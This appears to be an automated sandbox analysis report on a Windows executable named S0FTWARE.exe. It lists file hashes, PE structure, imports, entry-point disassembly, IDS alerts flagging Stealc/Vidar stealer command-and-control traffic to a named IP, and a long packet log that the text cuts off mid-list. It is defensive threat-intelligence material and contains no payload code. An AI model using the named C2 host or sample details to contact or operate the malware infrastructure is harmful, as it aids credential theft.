                                                                                                                                                                                                                                                                                                                  SHA-512:56366B8E076D5057D3BB3288C81E9D5A56174EB1582B6DB9BBD2587397EB948F4A70816240E001E5E781D49F7804D03A6E3CBD456D2A587A2F0735F6939ABBE7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4307570372523415
                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                  File name:S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                  File size:5'526'528 bytes
                                                                                                                                                                                                                                                                                                                  MD5:0da768d82b6b4b1ce65f888d4191a228
                                                                                                                                                                                                                                                                                                                  SHA1:0c040af6c4702c1efc41de91c8c670a33f91f7c1
                                                                                                                                                                                                                                                                                                                  SHA256:52d6508cc82d8084af7ed3097832a425678837366b171945a47b3d6a76f448ff
                                                                                                                                                                                                                                                                                                                  SHA512:a545072e17ecac1d8efe4ff8b80640f239f0d8f02941108426418a47562a8fc21ba90c6cba827d3701d06b9cce1c05f80c5607c388bb61d5d269db9a059f97d2
                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:18wBD04K2Sv0reUvdYeUpbzB64uXMhWCzgoFkMbV0AmYSpuaDIVpG/xnVPiTJoMk:18wt02+KeOLCzuLPiGtW8b
                                                                                                                                                                                                                                                                                                                  TLSH:11465A50FADB84F5EA03093114A793BF17307D098B34DA8BEA147F6AE8776D10E32659
                                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........R...............$...................K...@...........................W.......T...@................................

                                                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                                                  Icon Hash:3b6120282c4c5a1f

                                                                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Entrypoint:0x45fcd0
                                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                  Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                                  jmp 00007F9B204FD080h
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], esi
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], edi
                                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                  jne 00007F9B204FF389h
                                                                                                                                                                                                                                                                                                                  mov eax, 00000000h
                                                                                                                                                                                                                                                                                                                  jmp 00007F9B204FF3E6h
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                                                                                                                                  cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                  jne 00007F9B204FF387h
                                                                                                                                                                                                                                                                                                                  call 00007F9B204FF479h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+20h], edx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+24h], esp
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [ebx]
                                                                                                                                                                                                                                                                                                                  cmp edx, ebx
                                                                                                                                                                                                                                                                                                                  je 00007F9B204FF39Ah
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                                                                                                                                  mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                                                                                                                                  sub edi, 28h
                                                                                                                                                                                                                                                                                                                  mov dword ptr [edi+24h], esp
                                                                                                                                                                                                                                                                                                                  mov esp, edi
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp], ebx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+08h], edx
                                                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                                                  mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                  mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                                                                                                                                  mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                                                                                                                                  mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                                  mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                                  mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                  mov edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                  mov eax, esp

                                                                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5410000x3dc.idata
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5620000x16438.rsrc
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5420000x1efd2.reloc
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x4bed600xa0.data
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                  .text0x10000x24c6950x24c8006906e98230875147600a4037a2ba6e66unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .rdata0x24e0000x26f8fc0x26fa0076b9a78ee9a805b0e3df9d486df44479unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .data0x4be0000x82cc80x53200db3d8bb644553e87fb49f32ef27f1fadFalse0.389203477443609data5.619634929665022IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                  .idata0x5410000x3dc0x4005148b9b98424957e60566f0199699ca0False0.4873046875data4.632010323785184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                  .reloc0x5420000x1efd20x1f000fc38af53e986a5cff5a9a9c06e0cac99False0.5627362651209677data6.643685617882402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .symtab0x5610000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .rsrc0x5620000x164380x166004ebce59d7e4fc7b0964660e118e1b32bFalse0.841524092178771data7.405440786604266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                  RT_ICON0x5622f40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.325
                                                                                                                                                                                                                                                                                                                  RT_ICON0x56295c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4166666666666667
                                                                                                                                                                                                                                                                                                                  RT_ICON0x562c440x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5777027027027027
                                                                                                                                                                                                                                                                                                                  RT_ICON0x562d6c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.6226012793176973
                                                                                                                                                                                                                                                                                                                  RT_ICON0x563c140x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7369133574007221
                                                                                                                                                                                                                                                                                                                  RT_ICON0x5644bc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5476878612716763
                                                                                                                                                                                                                                                                                                                  RT_ICON0x564a240xf199PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9981082960112532
                                                                                                                                                                                                                                                                                                                  RT_ICON0x573bc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                                                                                                                                                                                                                                  RT_ICON0x5761680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                                                                                                                                                                                                                                  RT_ICON0x5772100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.19680851063829788
                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x5776780x92dataEnglishUnited States0.6438356164383562
                                                                                                                                                                                                                                                                                                                  RT_VERSION0x57770c0x584dataEnglishUnited States0.2790368271954674
                                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x577c900x7a8XML 1.0 document, ASCII text, with very long lines (391), with CRLF line terminatorsEnglishUnited States0.3464285714285714

                                                                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                                                  kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                  2024-11-21T15:48:02.385968+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.13.32.95443192.168.2.849715TCP
                                                                                                                                                                                                                                                                                                                  2024-11-21T15:48:04.837219+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.84971749.13.32.95443TCP
                                                                                                                                                                                                                                                                                                                  2024-11-21T15:48:04.837402+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.13.32.95443192.168.2.849717TCP

                                                                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.014270067 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.056793928 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.056863070 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.057003021 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.059992075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.060024023 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.180881977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.228545904 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.228717089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.228799105 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.232155085 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.232383013 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.267067909 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.269370079 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.352170944 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.395347118 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.395363092 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.395494938 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.398428917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.399085045 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.518610001 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.569816113 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.569854975 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.569948912 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.574038982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.574919939 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.605556011 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.608221054 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.642755985 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.694608927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.734478951 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.734493017 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.734603882 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.738701105 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.739476919 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.859025002 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.931694031 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.931718111 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.931855917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.934618950 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:01.934736013 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.054861069 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.069073915 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.071723938 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074512005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074569941 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074572086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.074620008 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.076598883 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.076874018 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.127073050 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.200124025 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.245667934 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273541927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273561954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.273674965 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.361479998 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.410654068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420456886 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420516014 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.420552015 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.470803976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.500329971 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.504571915 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.576304913 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.577245951 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.621423960 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.625397921 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.695776939 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.696739912 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.728143930 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.839973927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.847629070 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.892647028 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.906327963 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.955147028 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049093008 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049177885 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049266100 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.080064058 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.086971998 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.090121984 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.091387033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.161576033 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.182934046 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.199501038 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.206546068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.209630966 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.210913897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.267750025 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.303108931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.413974047 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420274973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420334101 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420403004 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426436901 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426513910 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426579952 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.429174900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.429244041 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.432513952 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.450789928 CET49707443192.168.2.813.107.246.63
